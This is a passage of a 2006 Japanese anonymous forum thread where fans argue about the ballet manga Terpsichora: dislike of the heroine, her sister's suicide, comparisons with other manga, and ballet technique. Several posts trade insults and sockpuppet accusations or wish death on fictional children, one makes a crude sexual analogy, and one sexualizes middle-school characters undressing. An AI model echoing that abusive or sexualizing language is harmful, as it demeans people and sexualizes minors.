446 :花と名無しさん:2006/07/10(月) 16:23:18 ID:???0
漫画を読んでるとそうは思えないけどクララってそんなにすごい役じゃないよ。
顔や仕草の可愛さで選ばれても大して不自然じゃないってば。
もっとも水樹やら千花への入れ込み具合見てると貝塚の流れ的には超不自然だけどね。
それだって水樹と千花が凄すぎただけかもしれないし。

447 :花と名無しさん:2006/07/10(月) 16:23:27 ID:???0
>>444
しかも最愛の姉の不幸を栄養にして育ってると言われるし。
コレ、多分今後、作中でも言われるなw

448 :花と名無しさん:2006/07/10(月) 16:23:36 ID:???0
>>437
だからね、実力的には「あぶれる他の人」であるはずのユキが、
そのチャンスを掴んでしまう展開が、ユキ嫌いを育てているのだよ。

449 :花と名無しさん:2006/07/10(月) 16:24:19 ID:???0
>>443
絶対違うと思うし。


450 :花と名無しさん:2006/07/10(月) 16:24:50 ID:???O
ダメダメのび太がドラえもんの道具で幸運になって
ジャイアンはいつも酷い目に遭う。
ジャイアン目線で見たらのび太のせいで俺はこんな目にあったんだ!
って感じですかね?

451 :445:2006/07/10(月) 16:26:46 ID:???0
>基本的に駄目っ子六花ちゃんが一人前の踊り手になるお話で良いですかね?

この先アメリカは大きな問題を抱えて日本を守りきれなくなる。
そのときに、初めて甘えんぼの日本は自立を余儀なくされて強くなれるということが
テレプシを読むとわかってくるのであります。
テレプシコーラは、バレエマンガの覆面を被った、憂国の物語。

452 :花と名無しさん:2006/07/10(月) 16:26:56 ID:???0
>>448
なぜそれでユキ嫌いになるのか理解に苦しむ。
現実と混合してるのか?

453 :花と名無しさん:2006/07/10(月) 16:27:01 ID:???0
>>450
全然違う。

454 :花と名無しさん:2006/07/10(月) 16:28:33 ID:???0
千花が不幸になって他の子がその幸運をつかむより妹の六花でまだ良かったじゃん。
六花が怪我させた訳でなし。

455 :花と名無しさん:2006/07/10(月) 16:28:48 ID:???0
>>452
なにかを嫌いになるのに
正当な理由無しには嫌いになってはいかんと言うのかw

456 :花と名無しさん:2006/07/10(月) 16:29:27 ID:???0
>>445
ここは反米媚韓厨の来るところじゃないよ、

成田スレへ帰りな。

457 :花と名無しさん:2006/07/10(月) 16:29:49 ID:???0
>>452
漏れ自身は別に六花が嫌いじゃないけど、ゴッシーなんかと同じ視点で
なんで下手な六花ちゃんが(怒)って読者もいるだろそりゃ。

458 :花と名無しさん:2006/07/10(月) 16:32:11 ID:???0
>>452
現実的に考えるなら、ユキタイプは実際にいたらいい子だと思うよ。
しかし、漫画にヒロインとしては、嫌いなタイプ。

459 :花と名無しさん:2006/07/10(月) 16:32:26 ID:???O
じゃあどんなに顔がよくて頭がよくて性格もいい出来杉くんだけど
しずかちゃんと結婚するのはのび太で出来杉くん可哀想
だからのび太嫌いって感じか。

460 :花と名無しさん:2006/07/10(月) 16:32:28 ID:???0
>>451=>>445
スレ違いと言うより板違いだってことがわからないの?

だから右翼は嫌われるんだよ

空気読め

461 :花と名無しさん:2006/07/10(月) 16:32:37 ID:???0
結局、千花ちゃんの自殺がユキの今後の飛躍にどう繋がるんだろう…。

462 :花と名無しさん:2006/07/10(月) 16:33:47 ID:???0
>>451
あるいは、六花=亀頭 千花=包皮 とも見なせるね。
千花が死ぬまで六花はお姉ちゃんに何かと頼って、精神的に守ってもらっていた。
千花自殺ってのは、六花=亀頭からみると包茎手術を済ませた状態になる。
外からの刺激に耐えて強い亀頭になっていくんだね。
テレプシコーラは、バレエマンガの覆面を被った、おちんちんの物語。

463 :花と名無しさん:2006/07/10(月) 16:34:00 ID:???0
「俺、デキスギ君嫌い!自分があまり成績よくないから」ってのに似てる。

464 :花と名無しさん:2006/07/10(月) 16:34:03 ID:???0
>>457
だね。
わざわざ主人公の欠点にイライラする人の気持を
代弁するキャラを作中が配置されてるんだもんね。(多分)

465 :花と名無しさん:2006/07/10(月) 16:34:04 ID:???O
主人公嫌いってどこの漫画でもある話だよ。

466 :花と名無しさん:2006/07/10(月) 16:35:43 ID:???0
きのう前スレで荒らしに「税金泥棒!」とからかわれてたのは公立学校の教師かと思ってたけど、
実際は自衛官だったのかな?>>445=>>451

467 :花と名無しさん:2006/07/10(月) 16:35:53 ID:???0
ドラえもんの主人公って、のびた?どらちゃん?

468 :花と名無しさん:2006/07/10(月) 16:36:47 ID:???0
またレッテル厨がきましたよ

469 :花と名無しさん:2006/07/10(月) 16:38:09 ID:???0
>>463
出来杉君ならいいんだよ 
ノビ太が主役とったら皆変に思うでしょ?

470 :花と名無しさん:2006/07/10(月) 16:38:10 ID:???0
ま〜俺はユキちゃんより毛箱が嫌い

471 :花と名無しさん:2006/07/10(月) 16:38:14 ID:???0
>>468
図星だったようですねw

472 :花と名無しさん:2006/07/10(月) 16:39:00 ID:???0
>>468
「荒らしにかまう奴も荒らし」オマエが悪い!

473 :花と名無しさん:2006/07/10(月) 16:40:44 ID:???0
>>467
四次元ポケット

474 :花と名無しさん:2006/07/10(月) 16:41:26 ID:???0
ポケットが主人公かよw

475 :花と名無しさん:2006/07/10(月) 16:41:36 ID:???O
リバウンドと基本シュートしか出来ない桜木花道がレギュラーで
努力の人のメガネくんが出れないのは変でしょ?みたいな。

476 :レッテル厨:2006/07/10(月) 16:41:36 ID:???0
どうも〜レッテル厨どぇ〜すw
>>471>>472>>468をいじめちゃ駄目よッ
468みたいなのがいるほうが荒らしやすいから歓迎よんw

477 :花と名無しさん:2006/07/10(月) 16:45:13 ID:???0
>>475
おー、わかりやすい!

478 :花と名無しさん:2006/07/10(月) 16:45:41 ID:???0
ネットを使ったいじめはケバコだけでなく担任の女性教師も容疑者として匂わせてたけど、
これだけ思わせぶりなエピが回収されないまま終わったら駄作決定だよな。

479 :花と名無しさん:2006/07/10(月) 16:46:30 ID:???0
>>478
んなこたーねえ。

480 :花と名無しさん:2006/07/10(月) 16:47:52 ID:???0
漫画板もダンス板も引き篭もりブスが多いんでしょ?
六花ちゃんは実力の割にアピール上手いってだけ。
そういう子を妬んでるんだね。
実力なら私の方が断然上なのに・・・!ってね。

481 :花と名無しさん:2006/07/10(月) 16:49:39 ID:???0
結局自分に無いものを持ってる人を人は嫌いになるのです。
実力しかり。運しかり。

482 :花と名無しさん:2006/07/10(月) 16:50:29 ID:???0
いじめ問題は単にチカの自殺に説得力を持たせるための状況設定でそ。
ギシ先生は今後はユキだけに集中させたいのでは。

483 :花と名無しさん:2006/07/10(月) 16:52:10 ID:???0
>>480
六花?千花の間違いでは?

484 :花と名無しさん:2006/07/10(月) 16:52:12 ID:???0
クミ再登場かな?
第1話のモノローグが
「わたしがその子に初めて会ったのは小学校五年の二学期」
ってことはまた会えるんだよね。

485 :花と名無しさん:2006/07/10(月) 16:53:50 ID:???0
>>483
どっちだっていいんだよ、どうせレオタード姿にハアハアしてるキモヲタなんだろうからw

486 :花と名無しさん:2006/07/10(月) 16:54:15 ID:???0
>>484
来月から、いきなり空美編だったりして

487 :花と名無しさん:2006/07/10(月) 16:54:21 ID:???0
>>483
千花ちゃんは実力抜群でちょっとクールな子。

六花ちゃんは冨樫先生に抜擢されたのはおかしいとか、甘ったれとか下手とか言われてるけど
抜擢されたのもカラボスがあったからでああいう自己主張が出来るのも実力のうちだよ。

488 :花と名無しさん:2006/07/10(月) 16:58:17 ID:???0
で?

489 :花と名無しさん:2006/07/10(月) 16:58:59 ID:???0
今も昔も少女漫画の主人公なんて読者に嫉妬されて憎まれてナンボだよ

490 :花と名無しさん:2006/07/10(月) 17:00:42 ID:???0
>>485
どっちかというと、ロッカー室で中学校の制服を脱ぐところがハアハアできます

491 :花と名無しさん:2006/07/10(月) 17:01:35 ID:???0
ユキが嫌われるのはいい歳してツインテールを貫いているから。
レッスンでも二つのお団子続けてるし。空気読めない子だから。

492 :花と名無しさん:2006/07/10(月) 17:02:19 ID:???0
昔、きまぐれオレンジロードで優順不断な主人公にイラついたことがある。
キライって程じゃなかったが。

493 :花と名無しさん:2006/07/10(月) 17:03:02 ID:???0
ユキのツインお団子ってあさりちゃんに見える時がある。

494 :花と名無しさん:2006/07/10(月) 17:05:43 ID:???O
>>492
あー、あったなぁ…あれはイラついたw

なる程そんな感覚か。わかりやすい

495 :花と名無しさん:2006/07/10(月) 17:05:54 ID:???O
私はリア小のとき
本気で月野うさぎを妬んだり憎んだりしてたよw
うさぎ以外の戦士なんて悲惨そのものなのにうさぎばっかりで
リア小並の頭の持ち主が多い?

496 :花と名無しさん:2006/07/10(月) 17:07:06 ID:???0
>>493
タタミは殺しても死ななそうだ
しかし千花ちゃんは・・・ウウッ

497 :花と名無しさん:2006/07/10(月) 17:07:36 ID:???0
>>495
日本語でおk。

498 :花と名無しさん:2006/07/10(月) 17:08:53 ID:???0
>>496
そういやタタミもお勉強できるんだっけ。
まぁチカちゃんみたいに運動神経はないけど。

ギャル化したあさりちゃん見たからショックだった。

499 :花と名無しさん:2006/07/10(月) 17:09:14 ID:???0
クミは再登場する予感があるけど、どういうタイミングで出てくるのか掴めないな。

1巻から読み返した。
千花、初潮迎えてからロクなことないね…カワイソス
諸事情で連載追えないんだけど、次のコミックスはいつ発売なんだろう。
随分出てなくない?

500 :花と名無しさん:2006/07/10(月) 17:09:17 ID:???0
子供同士は私はあれができる、あの子はできないみたいなテクニックの比較になりがちだけど
大人(先生)目線で見ると違うよね。

501 :花と名無しさん:2006/07/10(月) 17:10:24 ID:???0
先月号に戻って悪いんだけど
瀕死のおばあちゃんがチカの手をギュッと握ったというのは

「お前も一緒に逝こうね」って意味なら余計怖いとオモタ

ビルの11階から外を見てたせいかもしれんが…

502 :花と名無しさん:2006/07/10(月) 17:10:26 ID:???0
あさりちゃんを思い出すのに15秒かかった。
途中までアラレちゃんとまちがってた。

503 :花と名無しさん:2006/07/10(月) 17:11:56 ID:???O
>>499
>>1

504 :花と名無しさん:2006/07/10(月) 17:12:13 ID:???0
>>495
若いね。
私は小学生のときはキャンディがメキシコに連れて行かれそうになってハラハラしたりとか。

505 :花と名無しさん:2006/07/10(月) 17:12:19 ID:???0
ほよよ〜

506 :花と名無しさん:2006/07/10(月) 17:14:14 ID:???0
東京ラブストーリーの有森成美にはイライラしたが・・・

507 :花と名無しさん:2006/07/10(月) 17:14:16 ID:???0
>>495
確かに兎マンセーで酷かったw
ユキの髪型って短いけど兎と同じだね

508 :花と名無しさん:2006/07/10(月) 17:15:03 ID:???0
おでん女。

509 :花と名無しさん:2006/07/10(月) 17:15:57 ID:???O
そういえばセラムン当時、うさぎ叩きが凄かったのを思い出した。

510 :花と名無しさん:2006/07/10(月) 17:17:40 ID:???0
>>503
見逃してた。トンです。

511 :花と名無しさん:2006/07/10(月) 17:17:45 ID:???0
崇拝スレはバレエやってる小中学生が多いのかも。
少女漫画の主人公に嫉妬叩きってかわいい。。。

512 :花と名無しさん:2006/07/10(月) 17:19:44 ID:???0
>>475
自分、おなじ生意気で口の達者な一年生でも清田信長(海南の猿)は好きだが
花道個人はあまり好きじゃなかったな。
でも湘北チームにいる花道は嫌いじゃなかった。キャラのバランスがいいからね。
無口な流川との対比、ちっちゃいリョータとの対比、挫折を知ってる三井との対比
責任感の強いゴリとの対比、気遣いができる木暮との対比、全部花道と対でしょ。

キャラのバランスと言えば、テレプシの茜はユキとの対比でいい配置にいるよね。
あの茜をあまり嫌いになれないのは、六花に欠けていて「あーあ、もう少し
なんとかならないのかね」という部分を茜は備えていて、茜のもつ欠点を
カバーしてるから。
なによりも、九州という中央から離れた場所から越して来て、しかも本部へは
新幹線利用。別に親がバレエ教師というわけじゃなさそう。これってちょっとの
ハンディでしょ。ユキが持っている(恵まれた)物を茜は持っていないんだよね。
(クミもユキが持っている恵まれた物をもってなかったが)

513 :花と名無しさん:2006/07/10(月) 17:21:54 ID:???0
>>511
あ〜だからユキ嫌い多いのか。
確かにいい歳したおばちゃんが叩いてたら、ちょっと・・と思う。

514 :花と名無しさん:2006/07/10(月) 17:25:03 ID:???0
いや、叩きも擁護もどっちもおばちゃん。

515 :花と名無しさん:2006/07/10(月) 17:26:44 ID:???0
茜の絵を見て、もしギシ先生が意図的に書き分けてるとしたら
案外茜は伸びないのかな、と言う気もする。
細かいところが雑になるとか大味とかあるのかなぁと。
なんでもパッと割と出来てしまう分そこで終わるとか。
二人並んでアチチュードの時とか脚の角度とかユキの方が綺麗に見えたし。
勝手に回転数増やしたりとかしてるうちに
優雅に一回転の大切さを見逃して身に付かないとか。

516 :花と名無しさん:2006/07/10(月) 17:27:08 ID:???0
>>509
それってアニメ?漫画?
漫画のうさぎはアニメほどヒドくないという擁護が当時n○ftyで出てたけど。
自分はアニメだと、レイちゃん....だっけ?よく巫女さんのかっこしてる子
が一番好きだったな。それとわかめみたいな髪のみちるさん。
まぁ、5人も8人も戦士を揃えて万遍なくファンに着いてもらおうと思ったら
主人公にはわかりやすい欠点がなくちゃならんでしょ。

517 :花と名無しさん:2006/07/10(月) 17:27:18 ID:???0
>>513
いってゴッシーくらいの年齢じゃないかなと予想

518 :花と名無しさん:2006/07/10(月) 17:28:22 ID:???0
セーラームーン詳しい人がいてびっくりだ!

519 :花と名無しさん:2006/07/10(月) 17:32:27 ID:???0
年代測定に詳しい人がいてびっくりだ!


520 :花と名無しさん:2006/07/10(月) 17:34:23 ID:???0
六花にも踊り手としての何かがあるのでしょ?
だからトガッシーが六花をプッシュし、その見る目を信頼した貝塚側も乗った。
六花に懐疑的だった鳥山先生も、六花の存在感や本番での出来を
認めていたし、貝塚先生も気に入っていた。
一方で、確実に実力のある茜もいたことで、六花で冒険できたのかもしれない。

その良さがわからないと「何であんな子がっ!」となるけど。
まぁ特定の人物に強く思い入れしていると六花が憎くなるかもね。
六花だって当初、うだつのあがらない時期があって、
でも実は金子先生の言うようにごまかしなく練習していた。
また、人によって伸びる時期や順境苦境の波はあるのだから、
最初うだつが上がらなかったからといって、ずっとそのままとは限らない。

521 :花と名無しさん:2006/07/10(月) 17:35:34 ID:???0
ゴッシーっていくつなんだろう。金子先生がタメ口きいてるくらいだから、20代半ば〜後半?
空美も気になるけど、母親の艶子の素性も気になる。
あれだけバレエやってるなら、育った家庭もそれなりだったろうに。
勘当されたのか、親が事業失敗かなんかで無一文になったのか、
親から継いだ財産も英一に食いつぶされたのか。

522 :花と名無しさん:2006/07/10(月) 17:36:22 ID:???0
そんなチカラ入れて庇うほどの問題かよ(苦笑)

523 :花と名無しさん:2006/07/10(月) 17:36:24 ID:???0
>>515
茜ちゃんは演技駄目で情緒なし、テクニックに走る癖があるから六花ちゃんと正反対だね。
プロにはなれそうだけど水樹ちゃんみたいには伸びない希ガス。
茜ちゃん、六花ちゃんと違って自分の欠点を反省してなさそうだもの。

524 :花と名無しさん:2006/07/10(月) 17:37:04 ID:???0
>>522
千花ヲタの力の入れ方の方がもっと凄いぞ。

525 :花と名無しさん:2006/07/10(月) 17:37:31 ID:???0
>>520
あー、いざとなったらダブルキャストの茜がいるから冒険もありかもね

526 :花と名無しさん:2006/07/10(月) 17:37:38 ID:???0
>>522
きっちり擁護されてお生憎様でしたw

527 :花と名無しさん:2006/07/10(月) 17:38:25 ID:???0
やっぱり水樹ちゃん最高

528 :花と名無しさん:2006/07/10(月) 17:39:07 ID:???0
力を入れて嫌う人がいるから、力を入れてかばう人が出てくるのさ。w

529 :花と名無しさん:2006/07/10(月) 17:39:13 ID:???0
素人のお客さんのためのクリスマス公演なんだから、
小さくてあどけなくて可愛いユキのクララの方が見た目にも良かったとオモ。
茜は技術的に優れていても見た目がクララって感じじゃないしw

530 :花と名無しさん:2006/07/10(月) 17:39:42 ID:???0
>>515
いや、あれは茜が綺麗。アチチードの後ろから見た絵描くの難しいからね。
詩織が「足首より頭が(ry」と指導してるシーンでしょ?
以下バレエオタのカキコなので、興味ある人だけ読んでね。
まず、軸足。靴の裏がどこに見えてる?ユキは真後ろで茜は内側でしょ?
あれでユキが軸足アンドォールしてなくて茜がアンドォールしてるってわかる。
次、挙げた脚の爪先の位置。ユキのは左側へより過ぎ。正しい位置は茜のように
クッペから真上に上がった位置。
それと腕。アロンジェじゃないんだから、ユキはもう少し手の平が合うように
しないと。茜もちょっと肘はりすぎかなとは思うけどね。


531 :花と名無しさん:2006/07/10(月) 17:39:45 ID:???0
>>529
持ち味の異なる二人で2回楽しめたということか

532 :花と名無しさん:2006/07/10(月) 17:40:05 ID:???0
>>520
六花に関しては、存在感があるとか、トガッシーの「妙に魅力的」なんて褒め言葉があるね。
それもまた才能のうちなのかも。

六花嫌いの人は、あのイジイジした感じが嫌なんじゃない?
私は特に六花嫌いじゃないけど、嫌いという人の気持ちはわかる。

533 :花と名無しさん:2006/07/10(月) 17:40:38 ID:???0
>>526
メンヘルさん?

534 :花と名無しさん:2006/07/10(月) 17:42:16 ID:???O
水樹ちゃんもそのうち・・・

535 :530:2006/07/10(月) 17:42:18 ID:???0
× 手の平が合う
○ 手のひらが向かい合う

536 :花と名無しさん:2006/07/10(月) 17:42:28 ID:???0
>>533
バカ、そうとわかってるんならつつくなよ、こいつしつこいんだから。

537 :花と名無しさん:2006/07/10(月) 17:44:18 ID:???0
水樹ちゃんは特殊キャラだから。


538 :花と名無しさん:2006/07/10(月) 17:44:32 ID:???O
六花て5巻まではかわいいんだけど
6巻からなんかメソメソぶりが悪化してつい
いらついちゃうんだよね

539 :花と名無しさん:2006/07/10(月) 17:44:59 ID:???0
主人公が大嫌いなマンガを愛読する感覚はわからんな。
一番じゃないというのはよくあるが。
(オルタナティブ・コミックは除く)


540 :花と名無しさん:2006/07/10(月) 17:46:45 ID:???0
チカのクララをみたバレエの評論家たちはべた褒めだったけど
茜やユキのをみた評論家のシーンはなかったわね

541 :花と名無しさん:2006/07/10(月) 17:48:06 ID:???0
まぁ六花ちゃんもこの先心から楽しいことってあまりない人生かもしれないですから、、、

542 :花と名無しさん:2006/07/10(月) 17:48:12 ID:???0
>>536
ユキやチカがどうこうというより、ここの住人の言うことにいちいち
イチャモンつけるために来てる感じだよな

いつも作品と関係ない、しかも他の住人が気にしないような
つまらない事ばっかりあげつらってからんできやがる

543 :花と名無しさん:2006/07/10(月) 17:49:44 ID:???0
ユキへの批判
「なんであんなテクニックの伴わない子がクララを!!・・・」
茜への批判
「なんであんな表現の伴わない子がクララを!!・・・」
ふとみへの批判
「なんであんな体型の伴わない子がクララを!!・・・」

視点が違うだけ。どれも欠けているものがある。

544 :花と名無しさん:2006/07/10(月) 17:51:56 ID:???0
六花が茜がって言うけど、ここんとこバレエのシーンが少なすぎ。
茜がバレエでなくいじめで六花を蹴落とそうとする話になりそうw

545 :花と名無しさん:2006/07/10(月) 17:54:07 ID:???0
ギシ先生、体力的にバレエの場面を描くの大変なのでは。
いじめの場面の方がラクかもしれん。

546 :花と名無しさん:2006/07/10(月) 17:54:25 ID:???0
ミズキへの批判
「なんで3回目で身長も伸びすぎた子がクララを!!・・・」


547 :花と名無しさん:2006/07/10(月) 17:54:49 ID:???0
>>543
すべて備えていたのが千花だった。

548 :花と名無しさん:2006/07/10(月) 17:57:13 ID:???0
>>547
演技レッスンしてくれる六花がいたしね

549 :花と名無しさん:2006/07/10(月) 17:58:42 ID:???0
>>545
んーバレエの絵を描くのは好きそうだけどね
気合がはいてるっぽいし

550 :花と名無しさん:2006/07/10(月) 17:58:56 ID:???O
次バレエの舞台があるのはいつだろう?
もう夏休みでコンクールも遅いだろうしね。
やっぱり貝塚のくるみ公演かな?


そういえばユキはコンクールあれ以来出てなくて可哀想だな。
去年は自分の所の発表会と重なってたとしても
今年は姉の事でそれどころではないと言うのは…
発表会で成績残すことも大切なんでしょう?

551 :花と名無しさん:2006/07/10(月) 18:01:40 ID:???0
>>550
今年は冨樫先生の発表会で客演する予定だったんでしょ。

552 :花と名無しさん:2006/07/10(月) 18:03:45 ID:???0
>>536
自演乙w

553 :花と名無しさん:2006/07/10(月) 18:06:25 ID:???0
千花のような子が自殺して、六花がうまくいくなんて
そんなの間違ってる。
六花氏ね不幸になれ!

554 :花と名無しさん:2006/07/10(月) 18:06:51 ID:???0
>>547
千花は運、
つまり実力が無いから。

555 :花と名無しさん:2006/07/10(月) 18:07:36 ID:???0
千花に欠けているのは運と、意外とメンタル

556 :花と名無しさん:2006/07/10(月) 18:08:21 ID:???O
>>551
それ言われたのは公演直前じゃん。
前にコンクール出たときは、正月くらいから準備してた。

コンクールがあったら富樫先生の方は断ったかもしれないし

557 :花と名無しさん:2006/07/10(月) 18:09:06 ID:???0
>>553
茜のような最低女、市ねしねしね
おまいなんて死んだ方がまし


558 :花と名無しさん:2006/07/10(月) 18:09:11 ID:???0
連載開始から今まで全く六花に悪感情や嫉妬を抱かない自分は
もはや少女の心から3億光年遠くに来てしまったって事ですな

559 :花と名無しさん:2006/07/10(月) 18:09:43 ID:???0
六花の強みは運と、意外とメンタル
弱そうで本番に強い。

560 :花と名無しさん:2006/07/10(月) 18:09:54 ID:???0
>>553
たしかにねぇ、バレエを習っている子ならそういう意見が多いだろうね。

561 :花と名無しさん:2006/07/10(月) 18:09:55 ID:???0
>>555

千花を批判する奴はメンヘルw

562 :花と名無しさん:2006/07/10(月) 18:10:48 ID:???0
>>561

ユキを擁護する人もメンヘルぽいよねえ・・・怖い

563 :花と名無しさん:2006/07/10(月) 18:11:34 ID:???0
マンガの中にいる小中学生の登場人物に嫉妬するほうが大人としては異常

564 :花と名無しさん:2006/07/10(月) 18:11:38 ID:???0
>>562
今頃気付いたの?>六花擁護はメンヘルw

565 :花と名無しさん:2006/07/10(月) 18:11:56 ID:???O
千花ちゃんを失った六花ちゃんを励ましてくれる子はいるのだろうか。

水樹ちゃんなら心のこもった言葉をくれそうな気がするけど、身近な存在じゃないからなあ。

566 :花と名無しさん:2006/07/10(月) 18:12:35 ID:???0
>>564
やっぱりそうだったの。こわっ!
これからは六花擁護する意見はメンヘルの人ということで
覚悟しておきます。

567 :花と名無しさん:2006/07/10(月) 18:13:17 ID:???0
自演の嵐だな

568 :花と名無しさん:2006/07/10(月) 18:13:47 ID:???0
>>567
六花擁護は自演ばっかりだよねwwww

569 :花と名無しさん:2006/07/10(月) 18:13:50 ID:???0
色んな意見があるけど、皆様が一番ゆるせないのは誰?

個人的にはバレエとバレーボールを取り違えた例の医者が許せん。

570 :花と名無しさん:2006/07/10(月) 18:14:07 ID:???0
>565
椿、あと副部長w

571 :花と名無しさん:2006/07/10(月) 18:14:33 ID:???0
クミの父が一番許せん。

572 :花と名無しさん:2006/07/10(月) 18:14:35 ID:???0
>>569
六花。
六花が不幸になりますように。
悲惨な目にあいますように。

573 :花と名無しさん:2006/07/10(月) 18:14:50 ID:???0
>>569
山岸〜〜〜〜〜
可愛い千花ちゃんを。ゆるせーん

574 :花と名無しさん:2006/07/10(月) 18:15:30 ID:???0
>>568
やっぱりそう?
私もそう思ってた。
精神を病んでそうだしね。

575 :花と名無しさん:2006/07/10(月) 18:16:04 ID:???0
>>573
千花ちゃんのような完璧ないい子が。
悲しすぎるよ。

576 :花と名無しさん:2006/07/10(月) 18:16:15 ID:???0
>>574
いや、君のことだよ。自演・・・・

577 :花と名無しさん:2006/07/10(月) 18:16:59 ID:???0
>>566
いい加減にしろよ…

578 :花と名無しさん:2006/07/10(月) 18:17:11 ID:???O
六花はフツ姫

579 :花と名無しさん:2006/07/10(月) 18:17:41 ID:???0
自演のばれたメンヘル六花必死(苦笑)
一人で何度も書き込んでやんのw

580 :花と名無しさん:2006/07/10(月) 18:17:56 ID:???0
>>576
自演以外では同意してくれる人がいなくてさぞつまらないのであろう。
本人は自演だと思ってないから。
だって秋田のあの女みたいに、中の人大勢だからw

581 :花と名無しさん:2006/07/10(月) 18:18:14 ID:???0
>>578
六花=フツに大賛成!

582 :花と名無しさん:2006/07/10(月) 18:19:02 ID:???0
>>578
あっそうか。
ユキって誰かに似てると思ったらフツだね。
なあんにもできないくせにね。

583 :花と名無しさん:2006/07/10(月) 18:21:33 ID:???0
現在このスレはほぼ一人で廻しております。

584 :花と名無しさん:2006/07/10(月) 18:23:55 ID:???0
なんでこんなにわかりやすい自演なんかするんだろう…。

585 :花と名無しさん:2006/07/10(月) 18:24:04 ID:???0
>>402
亀レスだけど、早い頃から、千花ちゃんは不幸になる気がしていたから。
山岸漫画の場合は、
主な登場人物クラスでありながら、あそこまで色々と与えられるのは不吉。
やがて生じる不幸との引き換えのようで。
先月号のような形で自殺するとは思ってなかったけど。

586 :花と名無しさん:2006/07/10(月) 18:24:49 ID:???0
なんだか、そんなに必死になって「チカ派」「ユキ派」って争うこともないマンガだと思うんだけどなー

誰かを悪役にしたいのかもしれないけど、どの人にも人間的な弱さ(欠点)があるわけで
そこを取り上げて批判してもしょうがないと思うよ。

さて、自分は今日やっとダヴィンチみてきたけど
この作品では霊界系の表現は欲しくなかったなと言うのが感想。
そして、作品としては救いようのない流れになったと感じたなー。

587 :花と名無しさん:2006/07/10(月) 18:25:23 ID:???0
>>584
六花ダメダメさ、六花ヲタのメンヘルっぽさは
多くの人が異口同音に考えていたことだから。
残念!(プゲラッ

588 :花と名無しさん:2006/07/10(月) 18:26:44 ID:???0
>>585
オマイ、心を病んでるな

589 :花と名無しさん:2006/07/10(月) 18:29:30 ID:???0
>この作品では霊界系の表現は欲しくなかったなと言うのが感想。

まあ夢オチですけどね。
でも586さんの言いたい事はわかる。
バレエをやってる現場の、リアルなナマナマしさを表現するのに
霊界系は邪魔ってことでしょ。
全く同感とまでは言わないけど、そのかんじはある程度共感。

590 :花と名無しさん:2006/07/10(月) 18:30:06 ID:???0
>>586
高いところから冷静風なレス、一番ヤボなアナタ

591 :花と名無しさん:2006/07/10(月) 18:31:38 ID:???0
まともな住人を自演ちゃんが駆逐する。
自分がメンヘルだから相手をメンヘル扱い。
(でもリアル生活ではアタシってば病気なんだから!薬もこんなに飲んでるんだから!とアピール)
それがギシスレクオリティ。



な、訳ないだろっ!

とある一人が留守のときはとってもまともなギシスレであります。


592 :花と名無しさん:2006/07/10(月) 18:33:07 ID:???0
>>565
>水樹ちゃんなら心のこもった言葉をくれそうな気がするけど、

全然そんな気しないよ。あの子って気遣いできなそうじゃん。

593 :花と名無しさん:2006/07/10(月) 18:34:08 ID:???0
>>586
589ですが、ちょっと続き。
私はバレエは全くの素人ですが、肉体を使ってこの世で踊るという
現世的な側面がある一方で、バレエがスポーツではなく藝術である
以上、スピリチュアルな側面もあると思うのです。
六花はやっぱり、そういう方面にかなりの才能のある子なんだと・・・
これも行き過ぎれば、それこそメンヘルとか宗教にハマリきりとか、
どっかに現実が飛んでいくことになってしまいますが。

594 :花と名無しさん:2006/07/10(月) 18:35:05 ID:???0
気遣いが出来る出来ないの描写は出てこなかったから何とも言えないね。

つかそもそも水樹ちゃんは、特に仲が良かったわけでもないし。

595 :花と名無しさん:2006/07/10(月) 18:36:47 ID:???0
>>592じゃないけど、水樹は気遣いとか出来なそうに一票。
なんか全く空気読めない感じ。実力あるからそれでいいけど。

596 :花と名無しさん:2006/07/10(月) 18:36:55 ID:???0
>>593
「昴」のプリシラのボレロと昴のボレロ上演のシーンでも読んで来いや!


597 :花と名無しさん:2006/07/10(月) 18:38:40 ID:???0
>>593
確かにユキは未完成ながらも、精神的な芸術面が豊かっていう描かれ方してたしね。
暗示にかかりやすかったり、踊りに関してもイメージ先行みたいなところあったから
肉体的な表現の素晴らしさを中心に描かれていたチカとは対照的だったかもね。

598 :花と名無しさん:2006/07/10(月) 18:39:58 ID:???O
まあなんだ、自演はスルーで

599 :花と名無しさん:2006/07/10(月) 18:40:10 ID:???0
ひとみちゃんがクララだと客ガッカリとか、ユキがクララだと客に失礼とか、
それぞれ言い分はわかるが、
貝谷レベルのバレエ団に客もなにもないよ。
公演という名の発表会に過ぎない。客は内部関係者ばっか。
このスレの中で、知り合いが出るわけでもない国内バレエ団の「くるみ割人形」の公演を、
自分でチケット買って足運ぶ人、何人いるんだか。

600 :花と名無しさん:2006/07/10(月) 18:41:05 ID:???0
>>596
593だけど、六花は昴かプリシラか、といえばもちろん昴のほうだよね(この先)。
楽しく踊っていたのは千花が死ぬまでなんだから。

601 :花と名無しさん:2006/07/10(月) 18:42:37 ID:???0
>>599
ばっかは言い過ぎ。

602 :花と名無しさん:2006/07/10(月) 18:43:13 ID:???0
>>599
同意。
そもそもネズミに子どもを使うというあたりで発表会レベルだ。
せめて跳躍力のある中学生男子を使えと。
現実世界であれで公演と銘打ったら客に失礼だよ。

603 :花と名無しさん:2006/07/10(月) 18:44:01 ID:???0
ダンス板でも、国内バレエ団のくるみなんぞ、
付属の教室で習うガキのスクツ、行くモンじゃねえといわれておるね。

604 :花と名無しさん:2006/07/10(月) 18:44:22 ID:???0
>>600
神懸かりバレエはもう勘弁してくれ。

605 :花と名無しさん:2006/07/10(月) 18:44:51 ID:???0
そこでギリヤーク尼崎ですよ

606 :花と名無しさん:2006/07/10(月) 18:45:23 ID:???0
篠原家も、チケット買って見に行ったのは、海外のバレエ団のくるみだったしね。

607 :花と名無しさん:2006/07/10(月) 18:48:48 ID:???0
日本のほとんどのバレエ団の公演が、関係者しか来ない発表会の延長だってのは
六花のせいじゃないじゃん。

608 :花と名無しさん:2006/07/10(月) 18:52:28 ID:???O
客に失礼は鳥山の台詞だし

609 :花と名無しさん:2006/07/10(月) 18:54:13 ID:???0
バレエの公演なんて、その教室のみんなの思い出作りの発表会と
団体の資金集めってのは周知の事実。


610 :花と名無しさん:2006/07/10(月) 18:56:49 ID:???0
>>274>>599
貝谷じゃなくて貝塚じゃ?

611 :花と名無しさん:2006/07/10(月) 18:57:10 ID:???0
貝塚のくるみは頑張ってゲストに人気ダンサーを呼んでるから
一般客もそれなりにいるだろう

612 :花と名無しさん:2006/07/10(月) 18:58:08 ID:???0
>>521
艶子、貧乏だけどバレエへの情熱だけはあるってな感じ?
じゃなきゃあそこまで落ちぶれない気がする>くみファミリー

昔は美智子先生と同期で、でもコールドにしかなれず
